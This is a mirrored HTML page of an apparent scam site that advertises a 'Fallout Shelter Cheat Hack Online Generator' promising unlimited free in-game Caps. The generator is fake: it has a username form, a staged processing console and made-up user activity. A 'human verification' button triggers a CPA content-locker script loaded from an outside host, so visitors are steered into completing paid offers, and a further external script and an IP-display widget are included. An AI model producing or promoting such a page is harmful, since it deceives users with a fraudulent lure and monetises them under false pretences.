<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<!-- Mirrored from hacksimulationgames.com/online-hack/FalloutShelterHack/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 17 Dec 2021 12:02:14 GMT -->
<head><meta http-equiv="Content-Type" content="text/html; charset=euc-jp">
  <link href="css/cssaae4aae4.css?family=Baloo" rel="stylesheet">
    <title>Fallout Shelter Cheat Hack Online Generator Caps Unlimited</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<meta name="description" content="Use Our Fallout Shelter Cheat Hack Online and you will receive an unlimited number of Caps in your game account for free,without download or install any fake software!Enjoy using our Fallout Shelter Cheat Online Generator!" />    
    <meta name="keywords" content="Fallout Shelter hack, Fallout Shelter hack online, Fallout Shelter hack apk, Fallout Shelter apk mod, Fallout Shelter mod online, Fallout Shelter generator, Fallout Shelter cheats codes, Fallout Shelter cheats, Fallout Shelter unlimited Caps, Fallout Shelter hack android, Fallout Shelter cheat Caps, Fallout Shelter tricks, Fallout Shelter cheat unlimited Caps, Fallout Shelter online generator, Fallout Shelter free Caps, Fallout Shelter tips, Fallout Shelter apk mod, Fallout Shelter android hack, Fallout Shelter apk cheats, mod Fallout Shelter, hack Fallout Shelter, cheats Fallout Shelter, Fallout Shelter generator online, Fallout Shelter Triche, Fallout Shelter astuce, Fallout Shelter Pirater, Fallout Shelter jeu triche,Fallout Shelter triche android, Fallout Shelter tricher, Fallout Shelter outil de triche,Fallout Shelter gratuit Caps, Fallout Shelter illimite Caps, Fallout Shelter astuce android, Fallout Shelter tricher jeu, Fallout Shelter telecharger triche, Fallout Shelter code de triche, Fallout Shelter cheat online, Fallout Shelter generator Caps, Fallout Shelter cheat generator, Fallout Shelter hacken, Fallout Shelter beschummeln, Fallout Shelter betrügen, Fallout Shelter betrügen Caps, Fallout Shelter unbegrenzt Caps, Fallout Shelter Caps frei, Fallout Shelter hacken Caps, Fallout Shelter Caps gratuito, Fallout Shelter mod Caps, Fallout Shelter trucchi, Fallout Shelter engañar">	
	<link rel="icon" type="image/png" href="img/favicon.png" />
	<!-- Open Graph Social Meta Tags-->
	<meta property="og:title" content="Fallout Shelter Cheat Hack Online Generator Caps Unlimited" />
	<meta property="og:description" content="Do you want to receive an unlimited number of Caps to your Fallout Shelter game account for free? Do not wait anymore! Try our new Fallout Shelter Cheat Online Generator. You will be the best with our online generator, you will get big advantage very easy and fast! Fallout Shelter Generator works directly from the browser, without being detected. Without the download on your disk, without risk of virus. Just use our Fallout Shelter Hack Generator and you will be very satisfied." />
	<meta property="og:type" content="website" />
	<meta property="og:url" content="" /> 
	<meta property="og:image" content="" />
    <!-- Google Fonts -->
	<link href="css/css8a7c8a7c.css?family=Open+Sans:300,400,700" rel="stylesheet">
	<link href="css/css99a099a0.css?family=Quicksand:400,700" rel="stylesheet"> 
	<!-- CSS -->
	<link rel="stylesheet" href="css/font-awesome.min.css">
    <link href="css/bootstrap.min.css" rel="stylesheet" />  
    <link href="css/animate.css" rel="stylesheet" />
    <link href="css/sweetalert2.min.css" rel="stylesheet" />
    <link href="css/magnific-popup.css" rel="stylesheet" />
    <link href="css/fancySelect.css" rel="stylesheet" />
    <link href="css/style.css" rel="stylesheet" />	
	
	<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2098445,"key":"21273"};
</script>
<script src="https://d13nu0oomnx5ti.cloudfront.net/5ff9d3c.js"></script>
	
	
</head>
<body>
	<div class="dotted-pattern"></div>	
	<header>
		<div class="branding-wrapper">
			<img class="logo-img" src="top-logo.png" />
		</div>
	</header>
	<div class="main-wrapper">		
		<div class="row">	
			<div class="generator-nav-wrapper col-md-3 no-padding-right">
				<div class="panel-box-border visitor-info-wrapper-outer">
					<div class="visitor-info-wrapper">
						<h4>Visitor Info</h4>
						<div class="visitor-info-row last-row">
							<span class="visitor-info-label">IP:</span><span id="ip" class="visitor-info-content"></span>
						</div>
					</div>
				</div>
				<ul class="nav nav-tabs generator-nav" role="tablist">
					<li role="presentation" class="active"><a href="index-2.html#online-generator" aria-controls="online-generator" role="tab" data-toggle="tab">Online Generator</a></li>
					<li role="presentation"><a href="index-2.html#latest-comments" aria-controls="latest-comments" role="tab" data-toggle="tab">Latest Comments</a></li>
					<li role="presentation"><a href="index-2.html#live-chat" aria-controls="live-chat" role="tab" data-toggle="tab">Live Chat</a></li>
				</ul>
			</div>
			<div class="nav-content-wrapper col-md-6 no-padding-right">
				<div role="tabpanel" class="tab-pane fade in active panel-content" id="online-generator">
					<div class="generator-wrapper">		
						<div class="panel-box-border">
						<div class="generator-wrapper-inner panel-box-wrapper same-height-panel">
							<div class="generator-status-wrapper">
								<div class="generator-status-panel-wrapper">
									<div class="status-wrapper">								
										<span class="status-label hide-first">Last Update<span class="font-fix">:</span></span> <span class=" status-highlighted hide-first" id="para1"></span><span class="status-separator hide-first">|</span>
										<span class="status-label">Server Status<span class="font-fix">:</span></span> <span class="status status-highlighted server-status">Online</span><span class="status-separator">|</span>
										<span class="stats">
												<span class="status-label">Users Online<span class="font-fix">:</span></span> <span id="online" class="status-highlighted"></span>
										</span>
									</div>
								</div>
							</div>
							<div class="panel-content">
								<div class="row">
									<div class="col-md-12">	
										<div class="generator-header">
											<h2><span style="color: #ffff00;">Connect to your Fallout Shelter game account</span></h2>
											<p><span style="color: #ffffff;"><strong>Follow the steps below! If you are using your mobile device(Android,iOS) enter your Fallout Shelter user name and select your operating system!If are you using a desktop(PC,Notebook,Mac) connect the device to PC,Notebook,Mac via USB cable and choose the device and in the User Name field put the name of the device,very important after you connect the device,open the game and leave the game open to read the data,then click the red button 'Continue'</strong></span></p>
										</div>		
									</div>
								</div>
								<div id="first-step-wrapper" class="first-step-wrapper">
									<div class="row">
										<div id="account-information-wrapper" class="account-information-wrapper col-md-12">
											<div class="blurred-overlay blurred-account"></div>
											<div class="row">	
												<div class="account-information-inner-wrapper">									
													<div class="account-info-fields-wrapper">
														<div class="account-username-wrapper">
															<h3 class="resources-title">Enter your username</h3>
															<div class="row">														
																<div class="account-username-item-wrapper col-md-12">
																	<div class="account-username-border-wrapper">
																		<img class="input-player-tag" src="img/player.png" />
																		<input id="clr-usernametag" type="text" maxlength="15" placeholder="Your Username..."/>
																	</div>																							
																</div>																							
															</div>
														</div>
														<div class="platform-select-wrapper">
															<h3 class="resources-title">Select your platform</h3>
															<div class="row">														
																<div class="platform-item-wrapper col-md-6">
																	<div class="platform-item-border-wrapper">
																		<div class="platform-item-inner-wrapper platform-1">
																			<i class="fa fa-android" aria-hidden="true"></i>
																			<span>Android</span>
																		</div>
																	</div>
																</div>
																<div class="platform-item-wrapper col-md-6">
																	<div class="platform-item-border-wrapper">
																		<div class="platform-item-inner-wrapper platform-2">
																			<i class="fa fa-apple" aria-hidden="true"></i>
																			<span>iOS</span>
																		</div>
																	</div>
																</div>
															</div>
														</div>												
													</div>
													<div class="button-wrapper download-application-button-wrapper">
														<button id="first-step-button" class="button-generator" type="button" role="button">Continue</button>
													</div>	
												</div>
											</div>
										</div>
										<div id="resources-select-wrapper" class="resources-select-wrapper col-md-12">
											<div id="blurred-resources" class="blurred-overlay blurred-resources"></div>
											<div class="row">
												<div class="resource-item-select-wrapper col-md-12 top-resource-item">
													<div class="row">
														<div class="col-xs-1 responsive-button-wrapper no-padding-right">
															<div class="value-button-wrapper">	
																<div id="decrease-resource-1" class="decrease-button value-button">-</div>
															</div>										
														</div>
														<div class="col-xs-10 responsive-value-wrapper">
															<h3 class="resources-title">Amount of Caps</h3>
															<div id="resource-item-1-amount-wrapper" class="selected-amount-wrapper">
																<img class="resource-img" src="rp-icon.png" />
																<div id="resource-1-amount">200000</div>
															</div>	
															<div id="progressBar" class="resource-1-loadbar"><div></div></div>
														</div>											
														<div class="col-xs-1 responsive-button-wrapper no-padding-left">
															<div class="value-button-wrapper">	
																<div id="increase-resource-1" class="increase-button value-button">+</div>
															</div>	
														</div>	
													</div>	
												</div>
											</div>
											<div class="button-wrapper download-application-button-wrapper">
												<button id="second-step-button" class="button-generator" type="button" role="button">Generate</button>
											</div>	
										</div>								
									</div>
								</div>	
								<div id="processing-wrapper" class="processing-wrapper">
									<div class="main-console-wrapper">
										<div class="starting-loading-wrapper">
											<div class="searching"></div>
											<div class="wrapper">
												<div class="cssload-loader"></div>
											</div>
											<span class="starting-loading-title animated infinite bounce">Processing</span>
										</div>
										<div id="human-verification" class="human-verification-wrapper">
											<div class="human-verification-inner-wrapper">
												<h2>Verification</h2>
												<p>Before receiving the Caps to your game account you must verify that you are a human and not a software (Automated bot) and to prevent users that use our Fallout Shelter cheat to abuse our generator.</p>
												<div class="human-verification-loader-wrapper">
													<div class="human-verification-cssload-loader"></div>
												</div>
												<div class="verification-offers-wrapper">											
													<div class="button-wrapper human-verification-button-wrapper">
														<a href="index-2.html#human-verification-button"><button id="human-verification-button-inner" class="button-generator human-verification-button animated infinite bounce" type="button" role="button" onclick="CPABuildLock();">Verify Now</button></a>
													</div>
												</div>
											</div>
										</div>
										<div class="row first-console-row">
											<div class="col-sm-12">
												<div class="console-username-wrapper console-item-wrapper">											
													<h5 class="account-h5">Account Data:</h5>
													<span class="console-normal-text">Username</span><span id="console-username-value" class="console-item-value"><i class="icon-refresh rotating"></i></span><span class="console-normal-text">on</span><span id="console-platform-value" class="console-item-value"><i class="icon-refresh rotating"></i></span><span class="console-normal-text"></span>
												</div>
											</div>
										</div>
										<div class="row">
											<div class="col-sm-12">
												<div class="console-resourceitem1-wrapper console-item-wrapper">											
													<div class="console-resourceitem1-value-inner-wrapper">
														<img class="console-resource-img" src="rp-icon.png" />
														<h5 class="console-resource-title">Caps:</h5>
														<span id="console-resourceitem1-value" class="console-item-value console-resource-value">0</span>
													</div>	
												</div>
											</div>
										</div>
									</div>
									<div class="messages-console-wrapper">
										<div class="console-message"></div>								
									</div>
									<div class="loadbar-console-wrapper">
										<div id="progressBarConsole" class="console-loadbar"><div></div></div>
									</div>
								</div>
							</div>	
						</div>	
						</div>	
					</div>
				</div>
				<div role="tabpanel" class="tab-pane fade panel-content" id="live-chat">
					<div class="chat-wrapper">
						<div class="panel-box-border">
						<div class="chat-wrapper-inner panel-box-wrapper same-height-bottom-panel">	
							<div class="panel-overlay"></div>	
							<div class="panel-content">
								<div class="panel-title">
									<h2>Live Chat</h2>
								</div>	
								<div class="chat-inner-wrapper">
									<div class="livechatContainerTop" style=" height: 0px!important; border-top-left-radius: 4px; border-top-right-radius: 4px;">
										<span class="yellow_text" style=" font-size: 16px; position: relative; font-weight: 100; bottom: 10px;">
											Generator Chatroom (<span id="online2"></span>)</span>
									</div>
									<div class="livechatContainerCenter">
										<div id="livechatContainerChat" style="text-shadow: none;">
											<div class="livechatOverlaySmall" style=" display:none; z-index: 3; position: absolute; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.34);">
											</div>
											<div id="livechatContainerChatUserName">
												<div class="livechatContainerTop">
													<span class="chat-input-label">Enter your Chat Username</span>
												</div>
												<input id="livechatInputChatUserName" type="text">
												<div class="blue_button" id="livechatButtonChatUserName">
													<div class="blue_button_text noselect">
														Save
													</div>
												</div>
											</div>
											<div id="livechatContainerChatContent">
												<div id="livechatChatContent"></div>
											</div>
										</div>
										<div id="livechatContainerChatControls">
											<div style="margin-bottom: 5px; text-shadow: none;">
												<input id="livechatInputChat" placeholder="Send a message" type="text">
												<div class="live-chat-button-wrapper">
													<div id="livechatButtonChat">
														<div class="blue_button_text noselect">
															Send
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>						
							</div>
						</div>
						</div>
					</div>	
				</div>	
				<div role="tabpanel" class="tab-pane fade panel-content" id="latest-comments">
					<div class="comments-wrapper">
						<div class="panel-box-border">
						<div class="comments-wrapper-inner panel-box-wrapper same-height-bottom-panel">		
							<div class="panel-overlay"></div>
							<div class="panel-content">
								<div class="panel-title">
									<h2>Latest Comments</h2>
								</div>	
								<form action="http://hacksimulationgames.com/online-hack/FalloutShelterHack/index.htm#" class="comments-section-form">
		<fieldset>
			<section>
				<div class="comment-wrapper">
					<label class="input">
						<span class="comment-username" id="username1"></span><span class="timePosted"id="timePosted1"></span>
						<span class="comments" id="comment1"></span>														
					</label>
				</div>
				<label class="input"></label>
			</section>
		</fieldset>
		<fieldset>
			<section>
				<div class="comment-wrapper">
					<label class="input">
						<span class="comment-username" id="username2"></span><span class="timePosted" id="timePosted2"></span>
						<span class="comments" id="comment2"></span>														
					</label>
				</div>
				<label class="input"></label>
			</section>
		</fieldset>
		<fieldset id="comment-last">
			<section>
				<div class="comment-wrapper">
					<label class="input">
						<span class="comment-username" id="username3"></span><span class="timePosted" id="timePosted3"></span>
						<span class="comments" id="comment3"></span>														
					</label>
				</div>
				<label class="input"></label>
			</section>
		</fieldset>			
		<div class="add-new-comment-wrapp">
			<h4>Add a new comment</h4>
			<section>
				<label class="input" id="commentUsernameLabel">						
					<input id="commentUsername" placeholder="Username" type="text">
				</label>
			</section>
			<section>
				<label class="textarea" id="commentCommentLabel">						
					<textarea id="commentComment" rows="3" placeholder="Your Message..."></textarea>
				</label>
				<div class="post-new-comment-button-wrapp">
					<div class="post-new-comment-button-inner-wrapp">
						<a id="add-new-comment" class="button-style-1 small" href="javascript:void(0)">Post</a>
					</div>
				</div>
			</section>
		</div>
	</form>							</div>
						</div>
						</div>
					</div>
				</div>
			</div>
			<div class="col-md-3">
				<div class="recent-activity-wrapper">
					<div class="panel-box-border">
					<div class="recent-activity-inner panel-box-wrapper same-height-panel">	
						<div class="panel-overlay"></div>
						<div class="panel-content">
							<div class="panel-title">
								<h2>Recent Activity</h2>
							</div>	
							<div id="recent-activity" class="recent-activity">
							
							</div>
						</div>
					</div>
					</div>
				</div>
			</div>
		</div>
	</div>	
	<footer>
		<div class="policy-links">
			<a class="popup-contact popup-link" href="index-2.html#contact-us">Contact Us</a><span class="pp-sep"> |</span>
			<a class="popup-tos popup-link" href="index-2.html#terms-of-service">Terms of Service</a><span class="pp-sep"> |</span>
			<a class="popup-pp popup-link" href="index-2.html#privacy-policy">Privacy Policy</a>
		</div>
		<p>All trademarks, service marks, trade names, trade dress, product names and logos appearing on the site are the property of their respective owners.</p>
	</footer>
	<div id="terms-of-service" class="tos-popup-wrapper popup-wrapper mfp-hide">
		<h1>Terms of service</h1>
		
		<p>These terms of service ("Terms", "Agreement") are an agreement between the operator of MyWebsite ("Website operator", "us", "we" or "our") and you ("User", "you" or "your"). This Agreement sets forth the general terms and conditions of your use of the http://www.mywebsite.com website and any of its products or services (collectively, "Website" or "Services").</p>
		
		<h2>Age requirement</h2>
		
		<p>You must be at least 18 years of age to use this Website. By using this Website and by agreeing to this Agreement you warrant and represent that you are at least 18 years of age.</p>
		
		<h2>Backups</h2>
		
		<p>We are not responsible for Content residing on the Website. In no event shall we be held liable for any loss of any Content. It is your sole responsibility to maintain appropriate backup of your Content. Notwithstanding the foregoing, on some occasions and in certain circumstances, with absolutely no obligation, we may be able to restore some or all of your data that has been deleted as of a certain date and time when we may have backed up data for our own purposes. We make no guarantee that the data you need will be available.</p>
		
		<h2>Links to other websites</h2>
		
		<p>Although this Website may be linked to other websites, we are not, directly or indirectly, implying any approval, association, sponsorship, endorsement, or affiliation with any linked website, unless specifically stated herein. We are not responsible for examining or evaluating, and we do not warrant the offerings of, any businesses or individuals or the content of their websites. We do not assume any responsibility or liability for the actions, products, services and content of any other third parties. You should carefully review the legal statements and other conditions of use of any website which you access through a link from this Website. Your linking to any other off-site pages or other websites is at your own risk.</p>
		
		<h2>Advertisements</h2>
		
		<p>During use of the Website, you may enter into correspondence with or participate in promotions of advertisers or sponsors showing their goods or services through the Website. Any such activity, and any terms, conditions, warranties or representations associated with such activity, is solely between you and the applicable third-party. We shall have no liability, obligation or responsibility for any such correspondence, purchase or promotion between you and any such third-party.</p>
		
		<h2>Prohibited uses</h2>
		
		<p>In addition to other terms as set forth in the Agreement, you are prohibited from using the website or its content: (a) for any unlawful purpose; (b) to solicit others to perform or participate in any unlawful acts; (c) to violate any international, federal, provincial or state regulations, rules, laws, or local ordinances; (d) to infringe upon or violate our intellectual property rights or the intellectual property rights of others; (e) to harass, abuse, insult, harm, defame, slander, disparage, intimidate, or discriminate based on gender, sexual orientation, religion, ethnicity, race, age, national origin, or disability; (f) to submit false or misleading information; (g) to upload or transmit viruses or any other type of malicious code that will or may be used in any way that will affect the functionality or operation of the Service or of any related website, other websites, or the Internet; (h) to collect or track the personal information of others; (i) to spam, phish, pharm, pretext, spider, crawl, or scrape; (j) for any obscene or immoral purpose; or (k) to interfere with or circumvent the security features of the Service or any related website, other websites, or the Internet. We reserve the right to terminate your use of the Service or any related website for violating any of the prohibited uses.</p>
		
		<h2>Limitation of liability</h2>
		
		<p>To the fullest extent permitted by applicable law, in no event will Website operator, its affiliates, officers, directors, employees, agents, suppliers or licensors be liable to any person for (a): any indirect, incidental, special, punitive, cover or consequential damages (including, without limitation, damages for lost profits, revenue, sales, goodwill, use or content, impact on business, business interruption, loss of anticipated savings, loss of business opportunity) however caused, under any theory of liability, including, without limitation, contract, tort, warranty, breach of statutory duty, negligence or otherwise, even if Website operator has been advised as to the possibility of such damages or could have foreseen such damages. To the maximum extent permitted by applicable law, the aggregate liability of Website operator and its affiliates, officers, employees, agents, suppliers and licensors, relating to the services will be limited to an amount greater of one dollar or any amounts actually paid in cash by you to Website operator for the prior one month period prior to the first event or occurrence giving rise to such liability. The limitations and exclusions also apply if this remedy does not fully compensate you for any losses or fails of its essential purpose.</p>
		
		<h2>Indemnification</h2>
		
		<p>You agree to indemnify and hold Website operator and its affiliates, directors, officers, employees, and agents harmless from and against any liabilities, losses, damages or costs, including reasonable attorneys' fees, incurred in connection with or arising from any third-party allegations, claims, actions, disputes, or demands asserted against any of them as a result of or relating to your Content, your use of the Website or Services or any willful misconduct on your part.</p>
		
		<h2>Severability</h2>
		
		<p>All rights and restrictions contained in this Agreement may be exercised and shall be applicable and binding only to the extent that they do not violate any applicable laws and are intended to be limited to the extent necessary so that they will not render this Agreement illegal, invalid or unenforceable. If any provision or portion of any provision of this Agreement shall be held to be illegal, invalid or unenforceable by a court of competent jurisdiction, it is the intention of the parties that the remaining provisions or portions thereof shall constitute their agreement with respect to the subject matter hereof, and all such remaining provisions or portions thereof shall remain in full force and effect.</p>
		
		<h2>Dispute resolution</h2>
		
		<p>The formation, interpretation and performance of this Agreement and any disputes arising out of it shall be governed by the substantive and procedural laws of Bern, Switzerland without regard to its rules on conflicts or choice of law and, to the extent applicable, the laws of Switzerland. The exclusive jurisdiction and venue for actions related to the subject matter hereof shall be the state and federal courts located in Bern, Switzerland, and you hereby submit to the personal jurisdiction of such courts. You hereby waive any right to a jury trial in any proceeding arising out of or related to this Agreement. The United Nations Convention on Contracts for the International Sale of Goods does not apply to this Agreement.</p>
		
		<h2>Changes and amendments</h2>
		
		<p>We reserve the right to modify this Agreement or its policies relating to the Website or Services at any time, effective upon posting of an updated version of this Agreement on the Website. When we do we will  revise the updated date at the bottom of this page. Continued use of the Website after any such changes shall constitute your consent to such changes.</p>
		
		<h2>Acceptance of these terms</h2>
		
		<p>You acknowledge that you have read this Agreement and agree to all its terms and conditions. By using the Website or its Services you agree to be bound by this Agreement. If you do not agree to abide by the terms of this Agreement, you are not authorized to use or access the Website and its Services.</p>
		
		<h2>Contacting us</h2>
		
		<p>If you have any questions about this Policy, please contact us.</p>
		
		<p>This document was last updated on October 27, 2016</p>
	</div>
	<div id="privacy-policy" class="pp-popup-wrapper popup-wrapper mfp-hide">
		<h1>Privacy policy</h1>

		<p>This privacy policy ("Policy") describes how we collect, protect and use the personally identifiable information ("Personal Information") you ("User", "you" or "your") provide on the http://www.mywebsite..online website and any of its products or services (collectively, "Website" or "Services"). It also describes the choices available to you regarding our use of your personal information and how you can access and update this information. This Policy does not apply to the practices of companies that we do not own or control, or to individuals that we do not employ or manage.</p>
		
		<h2>Collection of personal information</h2>
		
		<p>We receive and store any information you knowingly provide to us when you fill any online forms on the Website.  You can choose not to provide us with certain information, but then you may not be able to take advantage of some of the Website's features.</p>
		
		<h2>Collection of non-personal information</h2>
		
		<p>When you visit the Website our servers automatically record information that your browser sends. This data may include information such as your computer's IP address, browser type and version, operating system type and version, language preferences or the webpage you were visiting before you came to our Website, pages of our Website that you visit, the time spent on those pages, information you search for on our Website, access times and dates, and other statistics.</p>
		
		<h2>Use of collected information</h2>
		
		<p>Any of the information we collect from you may be used to  personalize your experience; improve our website; improve customer service and respond to queries and emails of our customers; run and operate our Website and Services. Non-personal information collected is used only to identify potential cases of abuse and establish statistical information regarding Website traffic and usage. This statistical information is not otherwise aggregated in such a way that would identify any particular user of the system.</p>
		
		<h2>Children</h2>
		
		<p>We do not knowingly collect any personal information from children under the age of 13. If you are under the age of 13, please do not submit any personal information through our Website or Service. We encourage parents and legal guardians to monitor their children's Internet usage and to help enforce this Policy by instructing their children never to provide personal information through our Website or Service without their permission. If you have reason to believe that a child under the age of 13 has provided personal information to us through our Website or Service, please contact us.</p>
		
		<h2>Cookies</h2>
		
		<p>The Website uses "cookies" to help personalize your online experience. A cookie is a text file that is placed on your hard disk by a web page server. Cookies cannot be used to run programs or deliver viruses to your computer. Cookies are uniquely assigned to you, and can only be read by a web server in the domain that issued the cookie to you. We may use cookies to collect, store, and track information for statistical purposes to operate our Website and Services. You have the ability to accept or decline cookies. Most web browsers automatically accept cookies, but you can usually modify your browser setting to decline cookies if you prefer. If you choose to decline cookies, you may not be able to fully experience the features of the Website and Services.</p>
		
		<h2>Advertisement</h2>
		
		<p>We may display online advertisements and we may share aggregated and non-identifying information about our customers that we collect through the registration process or through online surveys and promotions with certain advertisers. We do not share personally identifiable information about individual customers with advertisers. In some instances, we may use this aggregated and non-identifying information to deliver tailored advertisements to the intended audience.</p>
		
		<h2>Links to other websites</h2>
		
		<p>Our Website contains links to other websites that are not owned or controlled by us. Please be aware that we are not responsible for the privacy practices of such other websites or third parties. We encourage you to be aware when you leave our Website and to read the privacy statements of each and every website that may collect personal information.</p>
		
		<h2>Information security</h2>
		
		<p>We secure information you provide on computer servers in a controlled, secure environment, protected from unauthorized access, use, or disclosure. We maintain reasonable administrative, technical, and physical safeguards in an effort to protect against unauthorized access, use, modification, and disclosure of personal information in its control and custody. However, no data transmission over the Internet or wireless network can be guaranteed. Therefore, while we strive to protect your personal information, you acknowledge that (i) there are security and privacy limitations of the Internet which are beyond our control; (ii) the security, integrity, and privacy of any and all information and data exchanged between you and our Website cannot be guaranteed; and (iii) any such information and data may be viewed or tampered with in transit by a third party, despite best efforts.</p>
		
		<h2>Data breach</h2>
		
		<p>In the event we become aware that the security of the Website has been compromised or users Personal Information has been disclosed to unrelated third parties as a result of external activity, including, but not limited to, security attacks or fraud, we reserve the right to take reasonably appropriate measures, including, but not limited to, investigation and reporting, as well as notification to and cooperation with law enforcement authorities. In the event of a data breach, we will make reasonable efforts to notify affected individuals if we believe that there is a reasonable risk of harm to the user as a result of the breach or if notice is otherwise required by law. When we do we will post a notice on the Website.</p>
		
		<h2>Changes and amendments</h2>
		
		<p>We reserve the right to modify this privacy policy relating to the Website or Services at any time, effective upon posting of an updated version of this privacy policy on the Website. When we do we will  revise the updated date at the bottom of this page. Continued use of the Website after any such changes shall constitute your consent to such changes.</p>
		
		<h2>Acceptance of this policy</h2>
		
		<p>You acknowledge that you have read this Policy and agree to all its terms and conditions. By using the Website or its Services you agree to be bound by this Policy. If you do not agree to abide by the terms of this Policy, you are not authorized to use or access the Website and its Services.</p>
		
		<h2>Contacting us</h2>
		
		<p>If you have any questions about this Policy, please contact us.</p>
		
		<p>This document was last updated on January 27, 2017</p>
	</div>
	<div id="contact-us" class="contact-popup-wrapper popup-wrapper mfp-hide">
		<h1>Send us a message</h1>
		<div class="contact-form-wrapper">
			<form role="form" id="contactForm" data-toggle="validator" class="shake">
				<div class="row">
					<div class="form-group col-sm-6">
						<label for="name" class="h4">Name</label>
						<input type="text" class="form-control" id="name" placeholder="Enter name" required data-error="Please enter your name.">
						<div class="help-block with-errors"></div>
					</div>
					<div class="form-group col-sm-6">
						<label for="email" class="h4">Email</label>
						<input type="email" class="form-control" id="email" placeholder="Enter email" required data-error="Please enter your email.">
						<div class="help-block with-errors"></div>
					</div>
				</div>
				<div class="form-group">
					<label for="message" class="h4 ">Message</label>
					<textarea id="message" class="form-control" rows="5" placeholder="Enter your message" required data-error="Please enter your message."></textarea>
					<div class="help-block with-errors"></div>
				</div>
				<button type="submit" id="form-submit" class="btn btn-success btn-lg pull-right ">Submit</button>
				<div id="msgSubmit" class="h3 text-center hidden"></div>
				<div class="clearfix"></div>
			</form>
		</div>
	</div>
	<!-- JavaScript/jQuery -->
	<script type="text/javascript" src="js/ip.js"></script>
    <script type="text/javascript" src="js/jquery.min.js"></script>	
	<script src="js/jquery-ui.min.js" type="text/javascript"></script>	
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript" src="js/jquery.countTo.js"></script>
    <script type="text/javascript" src="js/sweetalert2.min.js"></script>
    <script type="text/javascript" src="js/validator.min.js"></script>
	<script type="text/javascript" src="js/form-scripts.js"></script>
	<script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>
	<script type="text/javascript" src="js/sticky.js"></script>
    <script type="text/javascript" src="main.js"></script>
    <script type="text/javascript" src="com.js"></script>
	<script type="text/javascript" src="https://botifiles.com/script_include.php?id=843757"></script>
</body>

<!-- Mirrored from hacksimulationgames.com/online-hack/FalloutShelterHack/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 17 Dec 2021 12:02:24 GMT -->
</html>